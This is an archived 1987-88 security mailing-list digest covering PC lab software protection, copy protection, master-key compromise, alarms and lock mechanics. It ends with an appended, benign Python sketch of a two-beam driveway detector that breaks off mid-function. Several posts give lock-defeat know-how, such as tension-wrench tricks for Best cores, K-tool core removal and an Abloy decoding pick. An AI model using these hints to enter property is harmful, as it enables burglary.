Mark Eichin

From: *Hobbit* 11-Jan-1988 17:23:10
To: Security: ;
Subj: [7502] Security msgs re: student PC labs

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Tue, 24 Nov 87 11:46 EST
From: APHRODITE
Subject: PC Lab security

What we have done here is to designate one computer as a file server and put everything on a hard disk in different directories. The directories with the system software are read-only and the files are copy protected. Any software that can be copied is designated as freeware. We have set up a menu with all of the software on it that we have. When someone wants to use or do something they can just pick it off of the menu. The file server is set up for several applications.

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Subject: RE: Lab Security
From: IP60577@PORTLAND
Date: Mon, 23 Nov 87 23:24:18 EST

Here at the University of Southern Maine, we have a LAN network with Zenith 248 terminals. The students have no access to files through channels of hidden sub-directories, with hidden files. There is a public domain program from PcSig called Alter.Com that allows the changing of the archive bit. I am sure that there are a number of others out there. This seems to work very well here at the university. There are occasions when students will try to find the files, but for the most part, there is no way that students can find them.

The programs are not executed by DOS Batch files. There is a menu program that the students "myself included" must use. When a student boots the terminal, it gives them a selection menu that will load a program simply by moving the up and down arrow keys to make the selection. Once the selection is made, entering a carriage return will load the program.
The only way for students to get around this is to dis-assemble the program. However, how many students "who should be learning the programs themselves" know how to do that? Simple suggestion.

The words I have archived here are of mine own intent, since I am a Student of the University of Southern Maine, and NOT Faculty.

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Sat, 5 Dec 87 11:36:20 EST
From: Michael Grant
Subject: Copying Software

I've been of the opinion for a long time now that hardware vendors would really LIKE people to be able to copy software with their hardware. This is a selling point for the hardware. People who would otherwise not buy the hardware would, because they could get lots of free software from friends.

-Mike

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Mon, 7 Dec 87 12:53 EST
From: SPARKS@DRYCAS.CLUB.CC.CMU.EDU
Subject: Physically securing a pc

What is the best way to secure a pc system against physical theft? The AT lock provides some protection, but none against a burglar carrying away the whole cpu. I'm considering purchasing a security system which consists of attaching steel plates to the pc and peripherals with a strong adhesive, and then connecting each of the plates via a cable and lock. However, I just wonder what my options are, and if this is a safe route to follow.

Thanks,
Sparks@Drycas (bitnet)
MY0L@Andrew.cmu.edu (arpa/internet)

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Sat, 5 Dec 87 23:34:01 CST
From: Bob Kusumoto
Subject: Re: Student Lab Security and Preventing Trojan Horses

Just to let you know what has happened here a while back (don't remember when, maybe about a year ago), a BBS in the Chicago area called Mad Marty's, a popular Mac board, had a section of software that was unprotected by various hackers and put in a "pirate" section of this BBS. An association of software developers for the Mac caught wind of this and promptly got the local authorities involved.
Generally, they came to an agreement: no copy protected software to be distributed. If I remember correctly, a few Mac boards went down because of this incident.

Just wanted to let you know,

Bob Kusumoto (an Apple II user)
Internet: kus3@sphinx.uchicago.edu
BITNET: kus3@sphinx.uchicago.bitnet
UUCP: ...{!ihnp4!gargoyle,!oddjob}!sphinx!kus3

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

From: rick@uwmacc.UUCP (the absurdist)
Subject: Re: Student Lab Security (hidden costs)
Date: 10 Dec 87 00:16:58 GMT

>I wonder about all these precautions to stop students from copying
>software.

Stolen software causes a direct overhead to the University in the form of consultant's time wasted trying to help people who first rip you off for the program; then keep bugging you for help because they have no manual for the program and are guessing how it works; then have problems because their illegal copy doesn't get updated by the manufacturer for bug fixes; and finally steal your copy of the manual, leaving you with the bill.

Two common tactics are (1) doing a label swap for "key" disks (i.e., Lotus 123), so that it can be borrowed and a blank returned in its place (at least $50 worth of hassle each time); (2) removing pages from those lovely ring binder manuals everyone uses.

There isn't ANY solution to theft that doesn't penalize honest users heavily; as it is our procedures are much more inconvenient to our users than our original policies and we still have problems. Still, doing nothing makes the situation even worse. For commonly ripped off programs we have at times resorted to a roll-your-own copy protection (even for those programs which weren't copy protected originally), just to begin to defend ourselves against this problem. I don't support SELLING software as copy protected, but I think any facility should have the option of protecting their own legal copies to restrict them to their legal use.

-- Rick Keir -- all the oysters have moved away -- UWisc - Madison
"Watch the skies...."
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Fri, 11 Dec 87 10:33 EDT
From: Mike DeMaria (Pasart Harloc)
Subject: Copy protection

The only way that anyone is going to be able to defeat software piracy on campus is to physically copy protect the disk. One such program that I have found is a game called "Write your own Murder Party" by E.O.A. They have physically put a Laser "ThumbPrint" on track 15 that is unduplicatable, even by the most expensive disk duplicators. To further the problem, they placed the main program on the back side of the disk, with the FAT showing only one side. This prevents a person from loading the program and then looking for the "copy code". Hats off to EOA on this copy protection...

H O W E V E R

How does the honest person who bought the program (me) make a backup?

-Pas

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

From: sundc!netxcom!dgidez@seismo.css.gov (Daniel Gidez)
Subject: virus attack!!!
Date: 21 Dec 87 17:14:28 GMT

I have seen several articles relating to the MSDOS virus. If there is anyone out there in netland who has a command.com that they know is infected, I would like to get a copy of it, and NO I DON'T WANT TO USE IT, but merely try to isolate it and analyze it. I've got a system rearin' to go just for the test; if you have a copy of it, I would like to get it. I am not the FBI or any other law enforcement agency (and definitely not Microsoft). This would be appreciated and hopefully I could provide a solution (the actual code that's being used..). All responses will be kept confidential and I will even pay for it.

From: *Hobbit* 11-Jan-1988 19:05:37
To: Security: ;
Subj: [9780] Security msgs re: secure computer system discussion

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

From: motown!ninja!killer!elg@RUTGERS.EDU (Eric Green)
Subject: Re: Why secure systems?
Date: 6 Dec 87 17:16:07 GMT

>Since they probably have this funny thing called a "budget"
>to work within, the accountants most likely have forced them to find
>ways to equitably charge out resource usage.
The cost of maintaining a large IBM mainframe and interconnecting Ethernets (e.g. with PC's) is a constant, regardless of usage. While DP professionals make it seem like you are using up a "resource" which must be "accounted for", in actuality those expenses should be a constant number of dollars in the Computing Center's budget. Any other form of accounting discourages use of the available computer resources, thus harming productivity. Considering that a big IBM 3090 installation can handle over 400 users easily for the "mere" cost of 6 million dollars or so (about what a big computer cost 20 years ago!), we have the anomaly of companies buying big computers for whatever reasons (prestige? Array-processor coprocessor?), and then having that computer languish mostly unused because of restrictive accounting and security practices.

This is not, of course, related to 3rd-party computing resources, i.e. you own a mainframe, and local businesses contract with you for computing resources. In that event, it of course makes sense to distribute your constant cost amongst them based upon their usage of the system, plus a profit margin atop that. But for internal computer resources, not only is such an accounting irrelevant (the company still spends the same amount of money, no matter WHAT departments are charged for it), but counter-productive too (since it discourages use of the computer resources).

After all, why do you think that personal computers have become so popular, despite being quite limited in what they can do?
Simple: people no longer have to go through 20 layers of bureaucracy in order to gain access to computer resources, and they don't have to cope with a mentality that says computer resources are limited and rare and should be used sparingly -- a mentality that may have made sense when a large timesharing computer cost $15,000,000 (in today's dollars) and accommodated only 100 users, but in today's world, such an attitude is patently absurd (as personal computers amply demonstrate).

--
Eric Green
elg@usl.CSNET
{cbosgd,ihnp4}!killer!elg
Snail Mail: P.O. Box 92191, Lafayette, LA 70509
Hello darkness my old friend, I've come to talk with you again....

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: 8 Dec 87 09:56:01 PST (Tuesday)
Subject: Re: Why secure systems?
From: "Russ_Housley.XOSMAR"@Xerox.COM

RE: "I did mean to imply that AIM caused Multics to be insecure."

Good. The B2 rating mentioned by Eric Swenson (ejs%acorn@oak.lcs.mit.edu) clearly states otherwise.

RE: "I meant that AIM probably causes Multics to be _unusable_, at least by people trying to cooperate on a project, and that it is overkill for the problem it tries to solve."

I have witnessed large program development projects on Multics, with AIM enabled, and seen none of the problems you allude to. Most program development efforts deal with only one level of information (classification), so AIM does not even come into play. In those programs with more than one level of information, the developers are happy to have AIM because they can use the existing separation mechanism instead of implementing their own. Management is also pleased with AIM; a separation mechanism implemented in the operating system is harder to thwart than one implemented in an application. The B2 rating also gives management a good feeling about the correctness of the implementation.
Russ Housley
Xerox Special Information Systems
Vista Laboratory

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Tue, 8 Dec 87 08:39:29 pst
From: Doug Claar
Subject: Free and open systems counter argument

(I hope that this is the right place to send this...)

As an interesting contrast to the thought that computer systems should be open and free to all, I thought I would forward this real-life situation (from soc.singles via comp.society) as a counter-argument.

Doug Claar
HP Information Technology Group
UUCP: { ihnp4 | mcvax!decvax }!hplabs!hpda!dclaar -or- ucbvax!hpda!dclaar
ARPA: hpda!dclaar@hplabs.HP.COM

---------------forwarded text follows--------------------

[This message is from USENET, the `soc.singles' group, and is an interesting example not only of irresponsible computer administration, but a lack of knowledge that it is wrong (e.g. the person having to post to the group to confirm what is obvious - that the administrators violated the privacy of a user's account). -- Dave Taylor]

From: David Ehlert @ Portal Communications System

OK...Here is a dilemma that my SO [`Significant Other'] and I have run into. We live about 70 miles apart, and rely on UUCP mail as our primary way of communicating. Just this evening, I received a call from her about the following problem. Where she goes to school, two guys that she used to date have superuser privileges. Well, this evening, they went into her mail file. They screwed around with her login, and also deleted all saved mail messages. When one of the guys was approached about the happenings, he denied it. Later, all of my girlfriend's files and all were deleted. Now she has to re-construct all of her labs so that she can pass a couple of classes.

The dilemma is actually a nuisance, but I would like everyone and anyone to comment on what has happened. I guess that the easiest way is to answer the following question......

What would you do [if someone] did that to you..?? and...
What would your company/school do if they found out...??

Here are two guys who are about ready to graduate after at least 5 years of school, and to me, it sounds as if they have still refused to grow up.

David...

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Fri, 11 Dec 87 13:00:19 EST
From: bzs@bu-cs.bu.edu (Barry Shein)
Subject: Why secure systems?

(response to Louis Judice responding to my note):

>I suspect that YOUR
>department head would have trouble if the comp center came to him/her
>and said, "oh, we're going to charge your department $40,000 for
>network usage which we cannot account for..."

First, an understanding: I'm not analyzing a black box, I *am* management in said computing center, tho my relationship with some of these entities is purely horizontal. No, no one is imposing anything (at least in terms of some external force with power saying "account for that!"), the buck stops here. The only thing imposed is of course budget constraints.

There are several ways to manage these things. On the one hand it sounds intuitively appealing to become a utility and charge on a strict usage basis. On the other hand the two forces working against that are, first, the fear (not entirely unrealized) that a massive amount of the revenue for that sort of charging just goes right back into the process of generating charges. For example, systems programmers to add proper accounting methods to software, applications programmers to build summary statistics and account maintenance software, source licenses which might only be needed because of a self-imposed requirement to account in a uniform manner, administrative help to deal with accounts, apply chargebacks, chase down delinquent accounts (eg. people who keep running up charges after their grants run out, whaddya gonna do?
sue them?), hear poverty cases (also known as "if you could seed us this amount we could prototype and get granted within two years", or, "I know I'm out of money but if I don't get enough freebies to finish this grant the University's name is mud"), management time to simply provide a design and guidelines etc etc etc etc.

The second force is that we all do, at some level, eat out of the same trough. Internally, organizations (Universities are not unique in this respect) are really much more like socialist organizations with perhaps a limited form of capitalism (eg. light and heat are paid for by the central organization out of "heavy taxation", also known as overhead chargebacks to contract income.) A lot of waste could be saved by establishing uniform "taxation" to cover these costs just as we do with other things on the campus. People who overuse such facilities can be dealt with in other ways; the feedback mechanism of chargeback systems is not at all ideal, just one possibility.

It's all rather subtle, really.

>I don't think the issue is security in central environments. It's
>just poorly managed central environments that don't serve user needs!

Oh, definitely agreed.

-B

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Thu, 10 Dec 87 20:14:00 EST
From: Chris Torek
Subject: Re: Computer security systems.

    ... Banks have safes. Houses and cars have locks. I doubt that the proponents of "open-systems" leave their houses and cars unlocked.

Probably true. On the other hand, have you ever lived in an area in which you can leave things unlocked, need not count your change, and can trust your neighbors simply because they are your neighbors? It usually comes as a shock to urbanites and suburbanites, but such places do exist. They are, alas, all too rare; that does not mean we should not strive for them. (Unfortunately, this seems to be a direct effect of population density, and hence most people will not experience it.)
Chris

From: *Hobbit* 11-Jan-1988 22:22:49
To: Security: ;
Subj: [8734] Security msgs re: master keys

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

From: gwyn@brl-smoke.arpa (Doug Gwyn )
Subject: Re: master key security
Date: 4 Dec 87 18:14:28 GMT

>am I correct
>in thinking that it would be within the realm of possibility for our
>locksmiths to re-do the master keying in such a way as to avoid the need
>to cut and issue new keys to residents (i.e. change ONLY the master keying)?

It depends to some degree on how the masterkeying scheme is set up, but in general it would indeed be possible to switch to a different master (at the level of the stolen one) while invalidating few or none of the other keys in the system. During the transition, presumably legitimate possessors of the master would also have the new one, so that the locks could be gradually changed over.

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Tue, 08 Dec 87 08:09 LCL
From: Ken De Cruyenaere 474-8340
Subject: Master Key security

Sounds like you should abandon keys altogether and replace the locks with push-button combination locks, or the more expensive option: a card access system. Here at the Univ. of Manitoba we have a card access system controlling access to our more important areas, including the mainframe computer room, and one "terminal" area filled with IBM PS2s. (Our system has just expanded to 16 doors controlled by card access.) Other areas have combination locks. Both systems allow quick and easy "rekeying" - if you suspect the code has become known, change the code. If a card is lost or stolen - disable the card. We also have burglar alarm systems installed in most areas, sending a signal to the campus police and to the computer room (staffed 24 hrs) which has a bank of CCTV monitors showing the remote areas.

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

From: awr@tybalt.caltech.edu (Bruce Rossiter)
Subject: Re: master key security
Date: 8 Dec 87 13:48:51 GMT

I'd suggest putting the most important areas on *non-master* keys.
For example, if you have a distinct area within the building that can be locked up tight, with *very* restricted keying and no mastering, that might be a viable method. I'd also suggest some alarm systems for the computers themselves, if not for the whole area. You might also look into pressure sensitive alarm pads, so that if a computer is moved more than a preset amount, alarms go off at the campus security area, or even the local police station. Personally, I'd vote for a Medeco, non-master system on the doors.

Good luck!

-Bruce
----------
ARPAnet awr@tybalt.caltech.edu
BITNET awr@caltech.BITNET
UUCP {amdahl,rutgers}!cit-vax!tybalt.caltech.edu!awr

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Tue, 8 Dec 87 19:49:30 EST
From: Douglas Humphrey
Subject: Re: master key security

I can feel for this man's problems! I would suggest that you find the funds (take a PC or two to the pawn shop if need be) and buy some Medecos and have them installed on the doors. So what if they are not mastered. So what if people end up with a boat load of keys. That seems to be the way it has to be in the short run. A thousand dollars or two can save you the money and hassle expenses, and might just let you sleep at night, which is worth a LOT of money all by itself.

In the long run, an electronic system with DOOR BOLTS and not strikes might be a good way to go. You can do this yourself pretty cheaply, or contract it out if you don't have the man hours available.

Doug

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

From: mitch@stride1.UUCP (Thomas P. Mitchell)
Subject: Re: master key security
Date: 10 Dec 87 17:50:41 GMT

>We know they are after a master, the locksmiths know.
>Can anyone else offer any suggestions?

The only suggestion I can offer is to add an alarm system to the rooms. When I was in school security was terrible. The same type of lock was used on a door to a 10 million dollar lab as was used on a class room with two nubs of chalk and a worn out eraser.
Portable equipment (PC's, typewriters, calculators, terminals, copy machines and the like) needs better security from theft. But the problem is more than theft. The loss of control of master keys is a real nasty problem in a university. I got nailed by this at least once when I was in school. Two years after the fact I heard a tale of a quant. chem. class that someone aced the curve on because he 'salted' the samples in the drying ovens (he made a master key to get in the lab). I spent five weeks trying to get two analyses to check within the required limits. When I drew a new sample I was done in no time. I can only assume that my sample was one of the ones 'salted'. I was also not the only one in the lab night after night. Theft of passwords or introduction of a virus in a computer lab opens the same door of abuse.

Thomas P. Mitchell (mitch@stride1.Stride.COM)
Phone: (702) 322-6868 TWX: 910-395-6073
MicroSage Computer Systems Inc. a Division of Stride Micro.
Opinions expressed are probably mine.

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Thu, 10 Dec 87 12:56:06 pst
From: quintus!gregg@Sun.COM (W. Gregg Stefancik)
Subject: RE: Best control wrench

I suggest a test to determine the actual effectiveness of such a tool. According to my source (a book published by the National Locksmith devoted to the subject of interchangeable cores, the name of which currently escapes me), designing this type of tension wrench made it much easier for him to pick the control shear. Someone out there must have a Best core and the proper tools to design and use the tension wrench. If I had a Best core or access to one I would be more than happy to test this technique out, but unfortunately I don't currently own any Best cores. The tension tool I saw pictured in the book looked like the average tension wrench (of the HPC variety) with a groove filed such that the wrench would contact the control shell only.

Gregg

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

From: cvl!dlm@cuuxb.att.com (Dennis L. Mumaugh)
Subject: Re: master key security
Date: 11 Dec 87 00:54:37 GMT

Look at what the "pros" do. At NSA the system is different. Yes, they may have master key systems, but for really serious areas they have a special deal: The lock is a dead bolt which is surrounded with a metal shell with a flap. The flap is a hasp with a flange through it for a normal pad lock. When locking, one locks the normal dead bolt lock, then closes the hasp, and places a combination pad lock through the hasp and locks the pad lock. One has to rip off the whole assembly to get in. The pad lock is a Sargent-Greenleaf lock that is very difficult to open normally and almost impossible to pick. The work factor of the whole system is 10 hours. Obviously cleaning and maintenance people need appointments to get in. Security has to have a sealed envelope with the combination (or a cutting torch).

--
=Dennis L. Mumaugh
Lisle, IL ...!{attunix,ihnp4,cbosgd,lll-crg}!cuuxb!dlm

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

From: ncoast!mikes@RUTGERS.EDU (Mike Squires)
Subject: Re: master key security
Date: 20 Dec 87 08:48:55 GMT

As a freshman at Caltech in 1963 I took an unofficial course in locks from a club dedicated to the opening of locked doors called the "Mickey Mouse Club". I suspect that a few years later the members were hacking computer systems rather than mechanical locks. The members were only interested in the locks, rather than the contents; one of the leaders took a job at an office in a former bank so that he could work on the old vault lock (unfortunately he opened it in 1/2 hour but had to stay at that job for the rest of the summer).

To make a long story short, one of the pieces of information one learned was the combination for the north and south campus grand masters. It is my understanding that this situation was well known to the administration, but that they were unwilling to spend the money to rekey the campus (was it ever done?) and realized that the new combination could be discovered in minutes anyway, with some luck. In any case, all of the students learned to pick pin tumbler locks in seconds so that possession of the master key was not very important.

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

From: meow!kyle@uunet.uu.net (kyle)
Subject: Re: master key security
Date: 23 Dec 87 04:13:31 GMT

Sure, but a K-tool only works on deadbolts. If you want to remove the core from a doorknob you will have to resort to other means. (Maybe use the flat end of an ax? :-) )

--
Kyle Rhorer
meow!kyle@nuchat.UUCP

From: *Hobbit* 12-Jan-1988 05:00:30
To: Security: ;
Subj: [3627] Security msgs re: home security

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

From: hplabs!felix!zemon@RUTGERS.EDU (Art Zemon)
Subject: Re: Home security
Date: 4 Dec 87 22:04:57 GMT

The best suggestions from our local police (courtesy of many Neighborhood Watch meetings) are simply to make your home an unattractive target. The ways to do this are pretty simple and inexpensive.

Install exterior lights and leave them on all night -- not just until you go to bed.

Make the house look occupied at all times. Leave lights and maybe a radio or TV turned on when you are not home. If you really want to get carried away, unhook the phone ringers. This isn't really necessary because most burglaries are not carefully plotted and schemed. Almost no one is going to bother phoning to see if the lights are on but nobody is home.

Make sure your windows are locked with locks that don't give way easily. A burglar will try to pry a window open (silently) but usually won't bother with the mess (and noise) of breaking glass.

Start a Neighborhood Watch program. Your best protection is the nosy neighbor across the street who is always peering out the front window and ready to dial 9-1-1.
--
-- Art Zemon
   By Computer: ...!hplabs!felix!zemon
   By Air: Archer N33565
   By Golly: moderator of comp.unix.ultrix

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Tue, 08 Dec 87 16:06:23 EDT
From: Jeffrey R Kell
Subject: Re: Driveway Metal Detector

>I am very interested in obtaining the schematics for the
>circuitry that electronically detects cars at left turn lanes, etc.

A quick, inexpensive way of doing this would be using 'electric eye' type circuits but with GaAs infrared LED's. They're inexpensive, easy to hide, and give off no visible light. Put the LED transmitter on the end of your driveway (such as on a mailbox, or concealed on a driveway marker) and have it transmit diagonally across the driveway to a detector at the house. That's the basics, but you can have false alarms with a single beam. Using two parallel beams about 4 feet apart, setting 'alarm' only on a double-break, would avoid scaring the wife when a dog strolls by. This would seem much easier than tearing up your driveway to install or repair a pressure-sensitive or metal-detecting device.

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Tue, 08 Dec 87 23:24:44 PLT
From: Shawn Clabough <24847843%WSUVM1.BITNET@WISCVM.WISC.EDU>
Subject: Re: Driveway Metal Detector

Most left turn signals detect a car waiting with a coil of wire buried beneath the pavement. When the car travels over the coil, current is made and detected by the turn signal circuit. One problem with this is that some small cars and many motorcycles will not cause enough current to trigger the light.

A better and cheaper way to detect a car pulling up in the driveway is to use a light sensor, like what is used in 7-Elevens: when you enter the door, the light is obstructed and a bell is sounded. Using this system, your driveway would not have to be dug up to install a coil. Placed at the bottom of the driveway, the light sensor will detect any vehicle entering the driveway.
I'm not sure what one of these costs, but I'm sure your nearest Radio Shack will have information on these systems.

Shawn Clabough
Bitnet (24847843@WSUVM1)

From: *Hobbit* 12-Jan-1988 17:18:02
To: Security: ;
Subj: [10829] Security msgs re: various topics

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

From: mimsy!cvl!decuac!netsys!wb8foz@RUTGERS.EDU (David Lesher)
Subject: Re: Car alarms
Date: 6 Dec 87 18:45:57 GMT

Most of the inexpensive auto alarms use a current transformer or a voltage sensor on the internal wiring harness. In either case the system looks for a step change, indicating a dome lamp has come on. Of course, if the trunk or hood has no light, or the passenger door switch is bad, or the rear doors have no switches, well then you are SOL. Conversely, if the clock motor starts, or the cellular phone receives a call, everybody knows it.

--
Have you ever WATCHED cable TV, Judge Kennedy?
decuac!netsys!wb8foz

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Sat, 5 Dec 87 07:46:53 EST
From: Chris Torek
Subject: Re: virus alert

There is a flaw in this announcement. Nowhere does it mention that this affects IBM PCs. It became obvious to me when it mentioned Norton utilities, but only because I have IBM PC knowledgeable friends. (It does mention PC somewhere, but not IBM PC.)

Chris

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: 10 Dec 87 08:09:25 EST
From: *Hobbit*
Subject: Abloy

Abloys are "high security" locks, on a par with Medeco as far as the commercial market is concerned. I cannot believe that Manhattan locksmiths can't deal with it; there are Abloys in use all *over* NYC. The reason there's so much slop is that the key doesn't push pins up, it turns little disks around inside to a certain amount, allowing a sidebar type of thing to drop into slots when they line up. It works much like a dial-type combination lock, except that the disks all turn together as you rotate the key through the first 90 degrees.
The clearance between the key and the holes in the disks is not too critical; the angle to which the disk is turned is what is. I would heartily recommend that you hang on to your Abloy, try to find someone who can dupe a key for it. If you're feeling enterprising you can take the thing apart and see how it works, and make yourself a duplicate key with a little creative metalwork.

_H*

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Subject: Re: Lock Query
Date: Thu, 10 Dec 87 22:52:36 -0500
From: Fred Blonder

I inherited an "Abloy" lock on my front door. Was wondering if the lock theory experts on this list have had any experience or comments about this sort of lock.

Here's what I recall from an article about the Abloy lock in Popular Science (yeah, I used to read it) when it first came on the market.

Instead of having pins, the Abloy has a series of disks, stacked in a row along the lock's horizontal axis (Figure 1). Each disk has a cutout in the shape of an Archimedes Spiral: the distance-from-the-center-axis varies linearly with the angle. Initially, all the disks are lined up so that the maximum spiral-size lines up with the keyway, to make room for the maximally-large key, that is one with no cuts. When the key is inserted - unlike in a pin-tumbler lock - nothing moves to 'feel' the key's shape (Figure 2). The unlocking action does not occur as soon as the key is fully inserted.

As the key is rotated in the lock, it eventually comes up against the spiral edges of the cuts in the disks. Since the surface is spiraled, the exact point in the key's rotation where this occurs depends on the height that the key has been cut to at the point where it passes through that particular disk. Once the key is touching the disk, further rotation of the key drags the disk along with it for the remainder of the key rotation.
At the end of rotation, the disks will be in a scrambled state, at least as determined by the inner spiral cut, but one which conveniently happens to line up the notches in the outer edges of the disks, which allows a bar which spans the disks to drop into the groove formed by the lined-up notches. (Sort of like in a combination lock.) Further rotation of the key, disks, and bar finally slides the bolt or whatever it is that the lock is controlling. When rotating the key back the other way, it presses against the non-spiraled edge of the disks' inner cutouts, and drags them all back to the starting configuration. A consequence of all this is that the wrong key will rotate in the lock, but not open it.

I think the difficulty in picking it arises mainly by virtue of the fact that it is so bizarre. You'd need to manipulate the little disk-thingys while attempting to get the bar to drop. Sort of the worst of picking a pin-tumbler lock combined with picking a combination lock.

[Figure 1. (Side view) -- ASCII drawing of the key passing through the row of disks. Labels: "Disks"; "This key is fictitious. Any resemblance to the bitting on anyone's actual key is purely coincidental."]

[Figure 2. (Front view) -- ASCII drawing of one disk with its notch and the key's cross-section. Labels: "The notch (Actual position may vary.)"; "The thing consisting of the letters H and U and the caret is a cross-section of the key, in case you can't guess."]

Fred Blonder
(301) 454-7690
seismo!mimsy!fred
Fred@Mimsy.umd.edu

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Fri, 11 Dec 87 13:47:23 EST
From: bzs@bu-cs.bu.edu (Barry Shein)
Subject: Bumper Beepers.

There is a company called "Recco" (I think that's right, I know it's pronounced Reek-oh) which manufactures a variety of little boxes that can be worn or carried by outdoors people to assist in rescuing in the event of a problem (eg. buried under snow.) They've been advertising their stock on FNN.
I don't know if they sell the locator which they presented as being in the possession of typical rescue units, such as helicopter mounted.

-B

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

From: macleod@drivax.UUCP (MacLeod)
Subject: Abloy locks
Date: 13 Dec 87 09:33:27 GMT

My father was an eccentric sort of character who liked challenges. Through friends, he was contacted by some organized crime types who wanted a pick for Abloy locks. From what I understood, at the time the casinos in Nevada had just changed over to these locks on their slot machines. The keys to these locks were cylindrical and had cuts made at (I think) multiples of 15 degrees. My father built a peculiar looking device that took a lot of complex machining, with a half dozen or so (one for each cut) fingers that lifted into place and then were stopped down with a friction collar. The pick was inserted and manipulated until the fingers "read" the bevels in the lock, locked down, and withdrawn. The user then went off and made a key to those specs. I don't know if he ever perfected the scheme, but it was complex enough to keep him occupied and interested for about six months.

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Sat, 12 Dec 87 09:28:54 EST
From: "Wayne S. Mery"
Subject: Re: All related computer crimes and out come.

This past summer I attended a regional ISSA conference near Baltimore, MD. The conference was in Timonium, MD and sponsored by the Eastern PA and Baltimore ISSA chapters. A portion of the proceedings was given to a panel consisting of 2 Baltimore County PD officers who comprise that PD's computer/electronic crimes section, an FBI agent, a Secret Service agent, and others. The PD unit up to that time had a 100% conviction rate. Several investigations were pending at that time. Some of their cases, including convictions, were interstate crimes. You would do well to contact these people.
I expect, in addition to first hand info., that they have excellent connections to other organizations who could help in your study.

John Imhoff, FBI
William Wess, Secret Service
Det. Calvin Lane, Baltimore County PD
Det. Frank Simmons, Baltimore County PD

Happy hunting

Wayne S. Mery
Systems Programmer
Lehigh University
Bethlehem, PA

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

From: darrell@sdcsvax.ucsd.edu (Darrell Long)
Subject: Finding a long-lost person
Date: 17 Dec 87 20:43:18 GMT

I'd like to start a discussion of how to find a person. For example, suppose you want to find an old friend from high school who left the state 10 years ago because the Hell's Angels were after him. I don't know anyone like that, but just suppose... How would you go about finding such a person?

The obvious security issue here is perhaps this person does not want to be found. DMV records would be the first place I would look, then perhaps at Social Security. But who has access to these records?

Suppose you had a female friend that you'd lost track of: there's a good chance she has married and thus changed her name. How does this complicate the search?

What rights w.r.t. privacy does one have if they do not want to be found? (As we know from the Bork hearings, there is no Constitutional right to privacy.)

DL

--
Darrell Long
Department of Computer Science & Engineering, UC San Diego, La Jolla CA 92093
ARPA: Darrell@Beowulf.UCSD.EDU UUCP: darrell@sdcsvax.uucp
Operating Systems submissions to: comp-os-research@sdcsvax.uucp

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Sun Dec 27 22:25:18 1987
From: wrtfac!hassler@lognet2.ARPA (Barry D. Hassler)
Subject: Link Encryption Devices

Has anyone had any experience with link encryption devices? I am looking for information on devices which can encrypt synchronous and asynchronous lines at speeds at least up to 56 Kbps.
Of special interest would be devices that can be used in a dial-up environment (I imagine this would mean being able to turn the encryption on and off to control a modem). Please respond to me directly - I'll attempt to summarize back to the group if there is enough interest.

-BDH

Barry D. Hassler hassler%wrtfac@lognet2.arpa
System Software Analyst Control Data Corp.

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Tue, 15 Dec 87 19:41:09 EST
From: John Hanley
Subject: Re: Picking locks on pay phones

Maybe pay phones maintained by the BOCs don't have alarms, but a friend of mine is having an independent manufacturer install a pay phone at his store, and he claims that not only can it be programmed to call a number when its coin box is full and announce in an incredibly sultry voice that it's time to collect, but it can also dial a number and shout for help when it thinks it's being broken into.

--JH
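Jeffrey Kell's two-beam driveway detector earlier in this digest ("setting 'alarm' only on a double-break") is really a small piece of detection logic, and it can be checked against a replayed event log before any LEDs are wired up. The Python below is an added example, not code from the list or from any of its posters. It reads "double-break" as both beams being dark at the same instant, which a car spanning the roughly 4-foot gap does and a dog walking through (breaking one beam, then the other) does not; the beam names, the arriving/leaving inference from which beam went dark first, and the sample event stream are all constructed for illustration.

```python
from typing import Iterable, List, Tuple

# One sensor event: (seconds since start, beam name, "break" or "restore").
Event = Tuple[float, str, str]
BEAMS = ("outer", "inner")   # assumed names: "outer" is the beam nearer the street


def double_break_alarms(events: Iterable[Event]) -> List[Tuple[float, str]]:
    """Replay beam events and return (time, direction) for each alarm raised.

    An alarm fires only while BOTH beams are dark at the same instant.  A car
    longer than the beam spacing darkens both at once; a dog crossing the
    driveway darkens them one after the other and never trips the alarm.
    Direction is inferred from which beam went dark first.  The alarm re-arms
    once either beam is restored, so a car idling in the beams is reported once.
    """
    dark = {b: False for b in BEAMS}
    first_dark = None          # beam that began the current crossing
    armed = True
    alarms: List[Tuple[float, str]] = []

    for t, beam, state in sorted(events):
        if beam not in dark or state not in ("break", "restore"):
            raise ValueError(f"malformed event {(t, beam, state)!r}")
        if state == "break":
            if not any(dark.values()):
                first_dark = beam          # a fresh crossing starts here
            dark[beam] = True
        else:
            dark[beam] = False

        if all(dark.values()):
            if armed:
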